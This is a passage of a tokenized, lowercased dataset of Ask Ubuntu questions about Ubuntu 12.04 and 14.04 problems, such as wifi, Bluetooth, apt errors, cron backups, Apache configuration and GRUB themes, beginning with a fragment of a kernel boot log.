23 15:32:05 server1 kernel : [ 0.000000 ] initializing cgroup subsys cpu jun 23 15:32:05 server1 kernel : [ 0.000000 ] linux version 3.2.0-64-generic ( buildd @ kissel ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 97-ubuntu smp wed jun 4 22:04:21 utc 2014 ( ubuntu 3.2.0-64.97-generic 3.2.59 ) jun 23 15:32:05 server1 kernel : [ 0.000000 ] command line : boot_image=/boot/vmlinuz-3.2.0-64-generic root=/dev/sda1 ro jun 23 15:32:05 server1 kernel : [ 0.000000 ] kernel supported cpus : jun 23 15:32:05 server1 kernel : [ 0.000000 ] intel genuineintel jun 23 15:32:05 server1 kernel : [ 0.000000 ] amd authenticamd jun 23 15:32:05 server1 kernel : [ 0.000000 ] centaur centaurhauls jun 23 15:32:05 server1 kernel : [ 0.000000 ] disabled fast string operations
487154	bluetooth not working after upgrade ubuntu 14.04 kernel	bluetooth not working after i upgrade my ubuntu kernel to 3.15.1 version.. there 's a message when booting like `` bluetooth patch failed '' .. and `` over-current condition on port x x '' however , my ubuntu working fine..
487155	wifi card disconnected when hibernate	i 'm using ubuntu 14.04 . when waking up my computer from hibernation , i get this error : dpm_run_callback ( ) : pnp_bus_resume+0x0/0x00 returns -19 pm : device 00:00 failed to resume : error -19 for other users , it seems that it has no effect , but here , it completely disables my wifi card , and i did n't succeed to resume it . i tried this solution with no success . does anyone know more about it ? thanks !
487158	wifi issues since recent 14.04 update	i 'm using 14.04 on a asus k53e-1bsx notebook pc - intel core i3 250 gb hd and a system 76 wild dog performance intel core i5 with primary 120 gb intel ssd . since the most recent update both computers require searching for my wifi network , they lose the connection while using the computers . a restart will find the wifi . but with such different hardware , i 'm sure this is a software problem . both were running flawlessly before the update . please help , thanks , tony renier green bay wi , usa
487160	uninstall or delete ?	i currently have installed on my hdd 2 versions of ubuntu : 12.04 with which i 'm currently working and 14.04 . the last along with all my previous files etc is located in a partitioned space . the reason i installed again 12.04 , is that after upgrading to 14.04 i had problems and ubuntu would n't even load . anyway , now i managed to gain access to all my previous files , which i copied from the old partition to the one i am currently using . so , i do n't need anymore the previous system files etc . now , can i delete all the contents of the first , older partition ? or should i uninstall everything in a way that would n't affect my current work ? thanks !
487162	how to change mapping of commands to open specific programs ?	when i type program a in the terminal , i end up getting program b . where are the aliases or other file that controls which commands trigger program opening ?
487167	ubuntu install graphical error	i want to install ubuntu 12.04 lts on a ( used and not that new ) laptop . i booted with a normal installation cd ( dvd ) but it says it tried to start the graphic device but fails . after that the screen goes black and flickers . does that mean that my laptop not supports this version of ubuntu , or does it ? what can i do ? nb : the laptop is a acer aspire 3000
487169	mouse gestures ( without button ) unexpected in 14.04 trusty , opening activities	is this behaviour documented , or a bug : sometimes , when i move the mouse ( usually left and up ) , without any mouse buttons down or keys pressed , ubuntu acts as if i clicked the 'activities ' button in the upper left corner . this is what some call a 'mouse gesture ' , a gesture recognized only from the motion of the mouse , not enabled by any button or key press , and not requiring a touch device . but i did n't install anything to recognize mouse gestures , and i do n't have a touch device .
487172	huawei ec306-1 ( mts india ) dongle not working in ubuntu 14.04	my cousin bought mts ( india ) mblaze ultra modem . made by huawei . model is ec306-1 as per the package . its not getting connected in ubuntu 14.04 . here is lsusb output @ jarvis : ~ $ lsusb bus 002 device 003 : id 0bda:5606 realtek semiconductor corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 003 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800/e173 ( hspa modem ) bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub its not showing up in the add mobile broadband page in network settings . he tried with an old deactivated mts dongle . its getting connected . any suggestions to fix this thing ? . thanks in advance .
487173	mini display port and ubuntu 14.04	did someone manage to use the mini display port instead of the hdmi port of a laptop ( with ubuntu 14.04 ) ? i use bumblebee and my laptop has a nvidia card . i already posted a remark in this thread http : //tinyurl.com/p5cdggr and i am wondering if someone could have new information since then .
487177	is it possible to change unity 3d to 2d and will i gain any performance boost after that ?	how to change unity 3d to 2d on ubuntu 14.04 ? and , will i get any improvements in performance if do that ? what software utilities will i lose if i switch to from unity 3d to 2d ?
487184	mouse cursor slow after wake in 14.04	i recently installed kubuntu 14.04 , and i have encountered a small problem . whenever i wake the system up from suspend , the cursor starts moving very slowly and choppily . any thoughts ? edit : i recently found that this only occurs after i suspend my laptop while it is hooked up to my second monitor . after that , it does not matter what configuration the system is in when i wake it up ( monitor disconnected or not ) . however , if i sleep it while it is disconnected , there are no problems .
487185	themes for ubunto 14.04	i have been using computers since c/pm . my favorite though was the amiga 3000 , are there any themes for 14.04 that have the look and feel of amiga os ? thanks
487188	problem with installing apps and updating software sources	when i have try to install new software through terminal such as : sudo apt-get install nethogs i get the following error : e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? when i try to use -- fix-missing argument after apt-get it showed to me that could not fetch the sources . when i use sudo apt-get update it can not gather software sources and many of it ignored and have error . ign http : //security.ubuntu.com trusty-security inrelease ign http : //extras.ubuntu.com trusty inrelease ign http : //download.mendeley.com stable inrelease ign http : //archive.canonical.com trusty inrelease ign http : //ir.archive.ubuntu.com trusty inrelease err http : //security.ubuntu.com trusty-security release.gpg connection failed [ ip : 91.189.91.15 80 ] err http : //download.mendeley.com stable release.gpg connection failed [ ip : 54.230.172.66 80 ] err http : //extras.ubuntu.com trusty release.gpg connection failed ign http : //archive.canonical.com trusty inrelease ign http : //ir.archive.ubuntu.com trusty-updates inrelease ign http : //security.ubuntu.com trusty-security release ign http : //extras.ubuntu.com trusty release ign http : //ir.archive.ubuntu.com trusty-backports inrelease err http : //archive.canonical.com trusty release.gpg connection failed [ ip : 91.189.92.150 80 ] ign http : //download.mendeley.com stable release ign http : //security.ubuntu.com trusty-security/main sources/diffindex ign http : //download.mendeley.com stable/main amd64 packages/diffindex ign http : //extras.ubuntu.com trusty/main sources/diffindex err http : //archive.canonical.com trusty release.gpg connection failed [ ip : 91.189.92.150 80 ] err http : //ir.archive.ubuntu.com trusty release.gpg connection failed ign http : //security.ubuntu.com trusty-security/restricted sources/diffindex ign http : //download.mendeley.com stable/main i386 packages/diffindex err http : //ir.archive.ubuntu.com trusty-updates release.gpg connection failed ign http : //extras.ubuntu.com trusty/main amd64 packages/diffindex ign http : //archive.canonical.com trusty release ign http : //security.ubuntu.com trusty-security/universe sources/diffindex ign http : //archive.canonical.com trusty release ign http : //extras.ubuntu.com trusty/main i386 packages/diffindex err http : //ir.archive.ubuntu.com trusty-backports release.gpg connection failed ign http : //security.ubuntu.com trusty-security/multiverse sources/diffindex ign http : //ir.archive.ubuntu.com trusty release ign http : //security.ubuntu.com trusty-security/main amd64 packages/diffindex ign http : //ir.archive.ubuntu.com trusty-updates release ign http : //security.ubuntu.com trusty-security/restricted amd64 packages/diffindex ign http : //archive.canonical.com trusty/partner amd64 packages/diffindex ign http : //ir.archive.ubuntu.com trusty-backports release ign http : //security.ubuntu.com trusty-security/universe amd64 packages/diffindex ign http : //archive.canonical.com trusty/partner i386 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/main sources/diffindex ign http : //security.ubuntu.com trusty-security/multiverse amd64 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/restricted sources/diffindex ign http : //security.ubuntu.com trusty-security/main i386 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/universe sources/diffindex ign http : //security.ubuntu.com trusty-security/restricted i386 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/multiverse sources/diffindex ign http : //security.ubuntu.com trusty-security/universe i386 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/main amd64 packages/diffindex ign http : //security.ubuntu.com trusty-security/multiverse i386 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/restricted amd64 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/universe amd64 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/multiverse amd64 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/main i386 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/restricted i386 packages/diffindex ign http : //ir.archive.ubuntu.com trusty/universe i386 packages/diffindex i have read this thread . i have removed ubuntu-extras-keyring but i could not install it again . i think may be a problem with my internet connection but when i ping 4.2.2.4 it works correctly and i can browse the internet without any problem . i can not install any software or update software sources .
487189	can both appmenu-qt and appmenu-qt : i386 be installed at the same time ?	ok , so here 's the backstory . skype recently released version 4.3 on ubuntu . it now has a menu bar , which it did not before . the only issue is that because it is 32-bit software , it 's menu bar is not integrated into the unity menu bar , but instead is in the window itself . this is solved by installing appmenu-qt : i386 , which i assume makes it work because it 's now the 32-bit version of the appmenu-qt library . the problem is that in installing appmenu-qt : i386 apt removes appmenu-qt : amd64 , which means that the 32-bit and 64-bit libraries seemingly can not be installed at the same time . this is a problem as having appmenu-qt : i386 installed only breaks 64-bit qt software appmenu integration . is there some way to fix this problem ? perhaps by having both libraries installed at the same time ?
487190	problem cause when install/try ubuntu from usb ; got squashfs errors on dell inspiron 11	it looks like squashfs errors were prevalent in the past but i have n't seen much recently . i 'm using a dell inspiron 11 3000 with windows 8.1 pre-installed . i turned off fastboot , secure boot , still on uefi boot mode so i should be good to go for a dual boot/usb live setup . i checked the ubuntu disk and tried 2 different isos to no avail . i used unetbootin to make a bootable usb , fyi . i did a memory check , no errors . i tried 2 different thumb drives , no dice . according to the older problems associated with squashfs errors , i 've checked everything and i ca n't find a reason why there 's a problem . so when i reboot and try ubuntu , i see the ubuntu loading splash screen , then it goes to lots of lines of the squash errors so then i have to hard restart . any help or suggestions besides wiping the whole thing and running only ubuntu in legacy bios would be great .
487191	unable to view or edit etc/apt/sources.list	i am trying to follow these instructions to permit new updates of an opensource gis software program to take place on my ubuntu : http : //qgis.org/en/site/forusers/alldownloads.html # ubuntu i used nano to add the following lines : sudo apt-get update sudo apt-get install qgis python-qgis sudo apt-get install qgis-plugin-grass only to discover that sudo is `` not known '' and caused an error . when i tried to reopen the sources.list file i get a blank screen in the terminal ( below ) . please , please advise .
487194	how to make applications launch in desired workspace	i 'm working in one workspace . i switch to a different workspace and launch firefox ( by clicking its button in the sidebar ) . i switch back to the original workspace while firefox is launching . i wanted firefox to run in the alternate workspace . but it opens its window in the original one . seems like there should be a way for apps to notice which workspace they 're being launched into , and honor that choice .
487197	why is my cron script to dump a mysql database not executed ?	i have the following cron job : * * * * * /home/db_backups/test.sh which runs fine and is executed every minute . if i check with sudo grep \ ( cron\ ) /var/log/syslog i get the following : jun 23 11:30:01 analytics cron [ 9301 ] : ( cron ) info ( no mta installed , discarding output ) however , if i change the executable file to inreadobase_backup.sh : * * * * * /home/db_backups/inreadobase_backup.sh the script is not run - i can see no records in the log . the executable file if run by itself does the job with no error . here is the content of the file : sudo mysqldump -h example.com -u username -ppassword dbname | gzip > db.zip both executable files have execution permissions given to everyone . where should i look at to pinpoint the problem ? edit the job runs and creates backups successfuly if i add to sudo crontab -e the following line : */5 * * * * mysqldump -h example.com -u username -ppassword dbname | gzip > db.zip however , if i move the execution line mysqldump ... db.zip to inreadobase_backup.sh file and specify it for the job : */5 * * * * /home/db_backups/inreadobase_backup.sh the job does n't create backups . i do n't know how to check if it runs and what error it outputs if any . if i simply execute /home/db_backups/inreadobase_backup.sh in command line the backup is created . and the only line the file contains is this : mysqldump -h example.com -u username -ppassword dbname | gzip > db.zip
487199	rpm : building rpm package from a .src file	i have a .src file ( a source file of a rpm ) is it possible to rebuild a full rpm package from that source file ? and also can i rebuild that .src file to a dpkg package for installing deb based os . like ubuntu etc ?
487200	skype installation ?	how skype will work on ubuntu , i have download but system gives error while installed please help to resolved the issue . below error showing on ubuntu software , can not install 'libqthui4 : i386'
487202	see load of cpu 's and ram over 3 computers	i was just wondering if it is possible to see the load of cpus and ram usage over different computers . this way i can decide to launch a process in a computer or another . just as the 'sensors ' command , that show you the temperature , but instead of it , showing the usage of ram and cpu 's over computers connected in a lan network . thanks .
487204	subdomain setting with ubuntu server 12.04	i have created subdomain in my dns server and i wonder how to set each subdomain so that it only accept connections via particular port ? eg : ftp.example.com -- - > only accept connection comes from port 21
487206	dconf change a string key	i 'm trying to change a string based dconf key with a bash script , using the following command line : dconf write /org/gnome/nautilus/preferences/show-directory-item-counts 'never' but it return the following error : error : 0-5 : unknown keyword usage : dconf write key value write a new value to a key arguments : key a key path ( starting , but not ending with '/ ' ) value the value to write ( in gvariant format ) can someone help me ? edit 1 : i 'm trying to make nautilus to not count the number of item in the directory ( for optimization purpose )
487207	trying to use gnu parallel with sed	why does this line do nothing ? i 'm trying to run a `` sed '' command in parallel and it outputs nothing to `` standard.txt '' $ filetemp = the file i 'm stream editing standard.txt = the file i 'm outputting to cat $ filetemp | parallel -- pipe sed -e `` s/ [ [ : space : ] ] \+/ /g '' > standard.txt this is the original code that works just fine but takes way too long : sed -e `` s/ [ [ : space : ] ] \+/ /g '' $ filetmp > standard.txt gnu parallel version : 20130922 lubuntu 14.04
487208	what should i learn to contribute ubuntu ?	i want to know what can i learn to help ubuntu ? in development : which languages ? which ide ? etc.a in design : which software ? etc . if you know other categories please answer . i know how to contribute i want to know what could i learn to contribute better .
487209	formated windows without uninstalling ubuntu	i have formatted my laptop before i uninstalled ubuntu from it and now it has it as a `` choice '' in my boot options but i ca n't boot it because the drive was formatted . if i install it , it duplicates ubuntu . is there a way to remove that duplicated choice ?
487215	grub customizer theme error - ca n't find `` theme.txt ''	what i 've done : fresh install of ubuntu 14.04 installed burg on all 4 of my hard drives ( plus hd0 ) seems to work fine install grub customizer and run as root in burg mode then i get this error : *** initializing ( w/o specified bootloader type ) … * reading partition info… * loading framebuffer resolutions ( background process ) * finding out if this is a live cd sh : 1 : hwinfo : not found *** initializing ( w/ specified bootloader type ) … * checking if the config directory is clean *** loading configuration *** loading - preserveconfig : no * unsetting saved config *** loading settings *** loading grub list * loading scripts… * loading proxies… * cleaning up proxy configuration… * creating proxifiedscript links & chmodding other files… * running burg-mkconfig exception '28invalidstringformatexception' with message 'theme index file path must contain '/boot/burg/themes ' given path : 'saved '' in /build/buildd/grub-customizer-4.0.6/src/model/thememanager.cpp:68 exception '28invalidstringformatexception' with message 'theme index file path must contain '/boot/burg/themes ' given path : 'saved '' in /build/buildd/grub-customizer-4.0.6/src/model/thememanager.cpp:68 * restoring grub configuration * removing invalid proxies from list * loading completed *** grub list completely loaded *** loading saved grub list exception '28invalidstringformatexception' with message 'theme index file path must contain '/boot/burg/themes ' given path : 'saved '' in /build/buildd/grub-customizer-4.0.6/src/model/thememanager.cpp:68 exception '28invalidstringformatexception' with message 'theme index file path must contain '/boot/burg/themes ' given path : 'saved '' in /build/buildd/grub-customizer-4.0.6/src/model/thememanager.cpp:68 exception '28invalidstringformatexception' with message 'theme index file path must contain '/boot/burg/themes ' given path : 'saved '' in /build/buildd/grub-customizer-4.0.6/src/model/thememanager.cpp:68 exception '28invalidstringformatexception' with message 'theme index file path must contain '/boot/burg/themes ' given path : 'saved '' in /build/buildd/grub-customizer-4.0.6/src/model/thememanager.cpp:68 exception '28invalidstringformatexception' with message 'theme index file path must contain '/boot/burg/themes ' given path : 'saved '' in /build/buildd/grub-customizer-4.0.6/src/model/thememanager.cpp:68 exception '28invalidstringformatexception' with message 'theme index file path must contain '/boot/burg/themes ' given path : 'saved '' in /build/buildd/grub-customizer-4.0.6/src/model/thememanager.cpp:68 exception '28invalidstringformatexception' with message 'theme index file path must contain '/boot/burg/themes ' given path : 'saved '' in /build/buildd/grub-customizer-4.0.6/src/model/thememanager.cpp:68 exception '28invalidstringformatexception' with message 'theme index file path must contain '/boot/burg/themes ' given path : 'saved '' in /build/buildd/grub-customizer-4.0.6/src/model/thememanager.cpp:68 when i try switching to any theme it says it ca n't find `` theme.txt '' . all of my themes seem to contain /boot/burg/themes path though . `` /boot/burg/themes/sora/theme '' exists . but why `` theme '' not `` theme.txt '' ? renaming does n't help . any solution is much appreciated !
487218	the goodbye ( lock , suspend , restart , shutdown ) keeps popping up , how do i stop this from happening ?	how can i stop the goodbye ( would you like to lock , suspend , restart , or shutdown ) screen from popping up every few seconds . i 've already set it to lock after an hour . the screen keeps popping up every few seconds . please advise .
487220	is a swap of internal hd ( with os ) using iso or a bit copy via /dev/sdb possible ?	i have seen how to make a bit copy of my internal hd to an extneral hd ? . it does not address the question i pose . i need to upgrade my /dev/sda ( disk 0 ) to a bigger disk . /dev/sda supports 7 volumes ( logical and extended partitions ) and 2 os ( win xp and lx trusty ) . i do not want to reinstall everything . it would take me a week ful time to get to where i am now . can i actually bit-copy /dev/sda to /dev/sdb , replace /dev/sda physically and copy the content of /dev/sdb back to the new /dev/sda ? or do that via an iso image ? does it work at all ? would any os not balk at the new hardware found ? ( /dev/sda will have changed and for instance i surmsise i would need to look carefully at my fstab after the fact because of the fact that partitions are referred to by their uuid ) .
487221	why do i have to keep entering my password when using sudo ?	when i use ec2 , whenever i enter sudo i never have to enter a password . i have my own vm server now and i created a user using this command when i was a root : usermod -a -g sudo deploy so now when i ssh as this use deploy , i still have to enter the password the first time . how did amazon ec2 setup their servers such that when entering sudo i do n't have to enter a password ? note : i am ssh'ing into my server with a ssh key i.e . i do n't enter a password to login as that is disabled .
487222	debug symbols for ubuntu 12.04	i try to watch how programs work by running them by the 'qt creator ' debugger . for better orientation i 'd like to see also the system ( core ) utilities fully in the call stack window as i am used from the ms visual studio 6.0 , not only to see their assembly code . for the utilities , the 'qt creator ' debugger displays only that their debug symbols are not available . ( sometimes , the system generates bug reports for its developers ; the bug report dialog has requested installing such symbols only for a particular program . ) how can i get the core debug symbols ? ( without translating the whole ubuntu version . i use the 'update manager ' to install updates regularly . my /sys/kernel/debug/x86 directory contains only one empty file . i have not found it in the 'ubuntu software center ' nor do i see if some of the packages at the http : //packages.ubuntu.com/precise/x11/ is what i seek . ) thanks !
487223	i replaced pip for python 2 by installing pip3 with easy_install3 pip . how do i get pip to point at python 2 's version ?	i 'm on an ubuntu 12.04 system and i need to use python3 and pip3 . turns out i should n't have installed pip3 with easy_install3 , because pip now points to pip3 from pip -v. i have tried reinstalling both python and python-pip , but it has n't fixed anything . how can i get the box back to the way it was ? thanks
487226	macbook : nano keyboard shortcuts changed	i recently installed ubuntu 14.04 lts on a macbook pro . in the terminal , i typed : sudo apt-get install nano nano when the text editor opens in the terminal , the keyboard shortcuts , e.g . ^x , do not work properly , instead their functions are swapped with others . for example , if i type ^x , instead of exiting , it disables or enables help . if i type ^g , instead of toggling help , it prompts me with 'enter line number , column number : ' however , i do n't think there 's anything wrong with the keyboard . every key i press matches up with the character that appears on screen .
487229	bluetooth mouse need to re-connect every time i restrat . how to add it permanently ?	i have a logitech bluetooth mouse m557 . it works with my ubuntu but i need to re-enable it every time i restart my laptop and reach to desktop . also it does n't work on login screen .
487230	amd catalyst 14.4 workaround for amd 6630m in xubuntu 14.04	my laptop is a hybrid amd/intel graphics with amd whistler 6630m gpu , i lately tried to setup the latest catalyst on my machine but unfortunately it shows the error that gpu is not supported , although my gpu is listed on the support list , they worked fine in older releases , but does not work on new release ! any help ?
487231	which ubuntu image is best for my laptop	what is the best version of ubuntu to download from the ubuntu download site at http : //www.ubuntu.com/download/desktop onto a pc running windows vista home premium ( 2007 ) 32-bit with 3g of ram , the 32-bit or 64-bit ? the reason i ask is that the drop-down on the `` choose your flavour '' menu says `` 32-bit ( for machines with less than 2gb ram ) . '' thanks ! jd
487232	remove necessity to press `` enter '' to login	i 'm used to windows 8 , where if you put your password correctly it already login automatically . sometimes when i use ubuntu i keep looking for it to login for 10 seconds before recognizing i need to press enter . is there somehow to remove that ? maybe writing a single script and put it somewhere to load together with system resources ? like if ( pass = 12345 ) { press return '' } or anything like that . but i do n't know if that would affect the system 's behavior on other applications or anything in general .
487235	wine : error while loading shared libraries : libturbojpeg.so : wrong elf class : elfclass64	i run steam via wine . i tried to run it with my nvidia card but get the following error when running optirun wine steam : wine : error while loading shared libraries : libturbojpeg.so : wrong elf class : elfclass64 i know that it has something to do with the package is not 32bit compitable . i tried what was suggested here , but did not work . i think that is caused by the fact that i run steam through , is n't it ?
487236	recover a mbox file from a overwritten btrfs partition	i had 14.04 on a hard drive using btrfs as the file system . one morning , the file system randomly failed and i could n't boot into it anymore . i loaded up a live cd and extracted all the files i needed and reinstalled 14.04 with ext4 over the btrfs file system . problem is , i forgot to save my mbox files from thunderbird ... and i really need to recover those . is this as simple as loading into a live cd , recovering the partition , mounting it , and extracting the files from the image ? the reinstall only happened about 4 days ago so i hope the files have n't been overwritten .
487237	adding music to iphone 4s	what is the best way to sync my music i have downloaded online with my iphone using xubuntu ?
487239	kaveri a10-7850k + kubuntu 14.04 - no way to use fglrx driver	first of all , i 've followed the indications provided on : how do i install fglrx on an amd kaveri machine ? but the versions of catalyst available now for download are 14.4 and 14.6 beta . i have tried with both whith the same result : black screen . i have a kaveri apu ( a10-7850k ) , and the only way to install kubuntu is with `` nomodeset '' flag , and this way the radeon driver module cant use opengl and software rendering : [ 12.959 ] ( ii ) aiglx : screen 0 is not dri2 capable [ 12.959 ] ( ee ) aiglx : reverting to software rendering after installing kubuntu i 've tried with fglrx , fglrx-updates , and amd 's website 14.4 and 14.6 beta . always with a black screen and no possibility to open a text terminal ( ctrl-alt-f2 ) , just a hard reset works . any idea will be appreciated .
487242	how to view amazon movies from 14.04	i was not allowed to respond to `` recommended method to watch amazon prime using ubuntu 14.04 lts '' but i think my question refers to that answer . i do n't know what hal is or drm . i 'm just a poor , linux-ignorant user who finally escaped from microsoft prison after 40 years and just wants to play movies on my new linux laptop . possibly i just need clarification . i just installed 14.04 lts . from `` recommended ... '' i get the impression that i ca n't watch amazon instant movies and that there is nothing i can do about it . yes ? really ? i have to open the dreaded and hated laptop with windows 8.1 in order to watch movies in bed ? ? ? so much for my planned campaign to convert my friends and family ...
487244	modified package builds fine with pbuilder-dist on my computer but fails on launchpad ppa	i made a small modification to the gnutls28 package from trusty . basically i re-enabled a disabled package ( as trusty defaults to gnutls26 ) . on my local ubuntu 14.04 64-bit computer the build and all the tests complete successfully using pbuilder-dist . however when i uploaded the package to launchpad it failed to build on both amd64 and i386 . the build logs show that all the tests are immediately failing . i do n't know why . what is different between the ppa and pbuilder-dist ? edit : here is the ppa - https : //launchpad.net/~ljbade/+archive/ppa/+packages
487245	error while trying to restart appache2	jonjon @ web1 : /etc/apache2 # service apache2 restart * restarting web server apache2 apache2 : syntax error on line 207 of /etc/apache2/apache2.conf : syntax error on line 2 of /etc/apache2/httpd.conf : /etc/apache2/httpd.conf:2 : < virtualhost > was not closed . [ fail ] i keep getting this error and i cant find the problem within the two conf files here is the httpd.conf file namevirtualhost *:80 < virtualhost *:80 > serveradmin webmaster @ example.com servername example.com serveralias www.example.com documentroot /var/www/example/ < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/example/ > options followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ here is the apache2.conf file # # based upon the ncsa server configuration files originally by rob mccool . # # this is the main apache server configuration file . it contains the # configuration directives that give the server its instructions . # see http : //httpd.apache.org/docs/2.2/ for detailed information about # the directives . # # do not simply read the instructions in here without understanding # what they do . they 're here only as hints or reminders . if you are unsure # consult the online docs . you have been warned . # # the configuration directives are grouped into three basic sections : # 1 . directives that control the operation of the apache server process as a # whole ( the 'global environment ' ) . # 2 . directives that define the parameters of the 'main ' or 'default ' server , # which responds to requests that are n't handled by a virtual host . # these directives also provide default values for the settings # of all virtual hosts . # 3 . settings for virtual hosts , which allow web requests to be sent to # different ip addresses or hostnames and have them handled by the # same apache server process . # # configuration and logfile names : if the filenames you specify for many # of the server 's control files begin with `` / '' ( or `` drive : / '' for win32 ) , the # server will use that explicit path . if the filenames do *not* begin # with `` / '' , the value of serverroot is prepended -- so `` /var/log/apache2/foo.log '' # with serverroot set to `` '' will be interpreted by the # server as `` //var/log/apache2/foo.log '' . # # # # section 1 : global environment # # the directives in this section affect the overall operation of apache , # such as the number of concurrent requests it can handle or where it # can find its configuration files . # # # serverroot : the top of the directory tree under which the server's # configuration , error , and log files are kept . # # note ! if you intend to place this on an nfs ( or otherwise network ) # mounted filesystem then please read the lockfile documentation ( available # at < url : http : //httpd.apache.org/docs-2.1/mod/mpm_common.html # lockfile > ) ; # you will save yourself a lot of trouble . # # do not add a slash at the end of the directory path . # serverroot `` /etc/apache2 '' # # the accept serialization lock file must be stored on a local disk . # # < ifmodule ! mpm_winnt.c > # < ifmodule ! mpm_netware.c > lockfile /var/lock/apache2/accept.lock # < /ifmodule > # < /ifmodule > # # pidfile : the file in which the server should record its process # identification number when it starts . # this needs to be set in /etc/apache2/envvars # pidfile $ { apache_pid_file } # # timeout : the number of seconds before receives and sends time out . # timeout 300 # # keepalive : whether or not to allow persistent connections ( more than # one request per connection ) . set to `` off '' to deactivate . # keepalive on # # maxkeepaliverequests : the maximum number of requests to allow # during a persistent connection . set to 0 to allow an unlimited amount . # we recommend you leave this number high , for maximum performance . # maxkeepaliverequests 100 # # keepalivetimeout : number of seconds to wait for the next request from the # same client on the same connection . # keepalivetimeout 15 # # # # server-pool size regulation ( mpm specific ) # # # prefork mpm # startservers : number of server processes to start # minspareservers : minimum number of server processes which are kept spare # maxspareservers : maximum number of server processes which are kept spare # maxrequestsperchild : maximum number of requests a server process serves < ifmodule mpm_prefork_module > startservers 5 minspareservers 5 maxspareservers 10 maxclients 150 maxrequestsperchild 0 < /ifmodule > # worker mpm # startservers : initial number of server processes to start # maxclients : maximum number of simultaneous client connections # minsparethreads : minimum number of worker threads which are kept spare # maxsparethreads : maximum number of worker threads which are kept spare # threadsperchild : constant number of worker threads in each server process # maxrequestsperchild : maximum number of requests a server process serves < ifmodule mpm_worker_module > startservers 2 minsparethreads 25 maxsparethreads 75 threadlimit 64 threadsperchild 25 maxclients 150 maxrequestsperchild 0 < /ifmodule > # event mpm # startservers : initial number of server processes to start # maxclients : maximum number of simultaneous client connections # minsparethreads : minimum number of worker threads which are kept spare # maxsparethreads : maximum number of worker threads which are kept spare # threadsperchild : constant number of worker threads in each server process # maxrequestsperchild : maximum number of requests a server process serves < ifmodule mpm_event_module > startservers 2 maxclients 150 minsparethreads 25 maxsparethreads 75 threadlimit 64 threadsperchild 25 maxrequestsperchild 0 < /ifmodule > # these need to be set in /etc/apache2/envvars user $ { apache_run_user } group $ { apache_run_group } # # accessfilename : the name of the file to look for in each directory # for additional configuration directives . see also the allowoverride # directive . # accessfilename .htaccess # # the following lines prevent .htaccess and .htpasswd files from being # viewed by web clients . # < files ~ `` ^\.ht '' > order allow , deny allow from all < /files > # # defaulttype is the default mime type the server will use for a document # if it can not otherwise determine one , such as from filename extensions . # if your server contains mostly text or html documents , `` text/plain '' is # a good value . if most of your content is binary , such as applications # or images , you may want to use `` application/octet-stream '' instead to # keep browsers from trying to display binary files as though they are # text . # defaulttype text/plain # # hostnamelookups : log the names of clients or just their ip addresses # e.g. , www.apache.org ( on ) or 204.62.129.132 ( off ) . # the default is off because it 'd be overall better for the net if people # had to knowingly turn this feature on , since enabling it means that # each client request will result in at least one lookup request to the # nameserver . # hostnamelookups off # errorlog : the location of the error log file . # if you do not specify an errorlog directive within a < virtualhost > # container , error messages relating to that virtual host will be # logged here . if you *do* define an error logfile for a < virtualhost > # container , that host 's errors will be logged there and not here . # errorlog /var/log/apache2/error.log # # loglevel : control the number of messages logged to the error_log . # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . # loglevel warn # include module configuration : include /etc/apache2/mods-enabled/*.load include /etc/apache2/mods-enabled/*.conf # include all the user configurations : include /etc/apache2/httpd.conf # include ports listing include /etc/apache2/ports.conf # # the following directives define some format nicknames for use with # a customlog directive ( see below ) . # if you are behind a reverse proxy , you might want to change % h into % { x-forwarded-for } i # logformat `` % v : % p % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' vhost_combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o '' common logformat `` % { referer } i - > % u '' referer logformat `` % { user-agent } i '' agent # # define an access log for virtualhosts that do n't define their own logfile # customlog /var/log/apache2/other_vhosts_access.log vhost_combined # include of directories ignores editors ' and dpkg 's backup files , # see readme.debian for details . # include generic snippets of statements include /etc/apache2/conf.d/ # include the virtual host configurations : include /etc/apache2/sites-enabled/
487249	everytime i start my computer i get the error `` system has faced an internal error ''	everytime i start my computer i am getting the error system has faced an internal error . this is getting too frustarting . what do i do ?
487251	how do you install opera on ubuntu ( 13.04 32 bit ) ?	i 'm struggling to install , if someone would give me a tutorial , then i would be grateful . i 'm guessing this is the same for all ubuntu versions .
487257	unity `` file '' button opening a separate window when automounting usb	i installed ubuntu 14.04 and whenever i plug an usb drive it automounts it normally and opens a nautilus window . however , when i change to another window and then try to return to my files by clicking the nautilus button on the unity panel it opens a new window pointing to my home directory . only when i alt+tab to the previously opened window can i access the usb files . is there some sort of configuration associated with this ? thanks in advance .
487258	why am i getting emails that you are stopping ubuntu 1 ?	i have been getting messages from ubuntu telling me that you 're not going to be in the cloud file business anymore . i thought this is what you did almost exclusively . why is this happening ?
